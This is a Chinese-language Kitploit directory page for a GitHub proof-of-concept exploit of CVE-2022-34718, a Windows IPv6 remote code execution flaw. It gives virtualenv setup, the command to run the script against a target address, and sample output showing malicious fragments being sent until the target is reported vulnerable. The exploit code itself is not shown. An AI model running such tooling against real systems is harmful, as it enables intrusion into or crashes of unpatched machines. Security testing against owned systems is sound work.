Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-34718-PoC — 基于Python的CVE-2022-34718概念验证漏洞利用,这是Windows上IPv6的一个远程代码执行漏洞,使用Scapy构造并发送恶意分片。 | Kitploit
工具/GitHubGitHub/seclabresearchbv/cve-2022-34718-poc
Payload生成漏洞分析漏洞利用网络安全无线安全渗透测试
GitHubseclabresearchbv/cve-2022-34718-poc

CVE-2022-34718-PoC

基于Python的CVE-2022-34718概念验证漏洞利用,这是Windows上IPv6的一个远程代码执行漏洞,使用Scapy构造并发送恶意分片。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
4914553年前Kitploit 审核通过

CVE-2022-34718 IPv6 远程代码执行漏洞利用示例

该仓库包含 CVE-2022-34718 的漏洞利用代码,这是一个针对 Windows 系统上 IPv6 的远程代码执行(RCE)漏洞。

使用方法

由于该漏洞需要精心构造的 IPv6 数据包,因此依赖 Scapy 模块,并且需要以 root 权限运行。推荐通过虚拟环境运行此 PoC,如下所示:

root@kitploit:~
# virtualenv PoC
# source PoC/bin/activate
(PoC) # pip3 install -r requirements.txt
(PoC) # python3 ipv6-rce-poc.py <目标地址>

该脚本会告知目标系统是否易受此漏洞攻击。

root@kitploit:~
[...]
**** inner_frag_id: 0x24944eac
Preparing frags...
Sending 64 frags...
.
Sent 1 packets.
[...]
Sent 1 packets.
Now sending the last inner fragment to trigger the bug...
.
Sent 1 packets.
Success! The system is vulnerable...
下载工具